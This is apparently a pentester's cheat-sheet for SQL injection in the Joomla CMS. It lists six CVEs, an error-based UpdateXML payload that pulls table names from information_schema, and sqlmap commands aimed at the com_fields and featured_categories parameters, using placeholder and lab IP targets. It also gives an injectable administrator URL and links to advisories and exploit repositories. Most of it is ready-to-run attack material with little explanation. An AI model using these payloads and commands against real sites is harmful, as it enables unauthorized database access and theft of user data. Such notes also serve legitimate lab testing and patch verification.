-
CVE-2020-35613
-
CVE-2020-10243
-
CVE-2019-19846
-
CVE-2018-8045
-
CVE-2018-6376
-
CVE-2017-8917
UpdateXML(2, concat(0x3a,(SELECT HEX(MID(TABLE_NAME,1,16)) FROM information_schema.tables WHERE TABLE_NAME LIKE 0x257573657273 LIMIT 1,1), 0x3a), 1)
+) Linux command: echo "hexa value" | xxd -r -p
+) Link: https://www.rapidtables.com/convert/number/hex-to-ascii.html
sqlmap -u "[your taget]/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" --dbms=mysql --technique=E --dbs
sqlmap -u "http://192.168.119.128/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" --dbms=mysql --technique=E --dbs
...Update later-...
sqlmap -r sqli.joomla.req --level=5 --risk=3 -p "jform%5Bparams%5D%5Bfeatured_categories%5D%5B%5D" --dbms=mysql --second-url "[your domain/IP]/index.php" --technique=E --dbs
sqlmap -r sqli.joomla.req --level=5 --risk=3 -p "jform%5Bparams%5D%5Bfeatured_categories%5D%5B%5D" --dbms=mysql --second-url "http://192.168.131.134:8080/index.php" --technique=E --dbs
[your domain/IP]/administrator/index.php?option=com_users&view=users&filter[excluded]='
- https://www.empressia.pl/blog/184-analiza-podatnosci-sql-injection-w-cms-joomla
- https://pentest.co.uk/labs/advisory/cve-2020-10243/
- https://xz.aliyun.com/t/6990
- https://github.com/luckybool1020/CVE-2018-8045
- https://www.notsosecure.com/analyzing-cve-2018-6376/
- https://github.com/gottburgm/Exploits/tree/master/CVE-2017-8917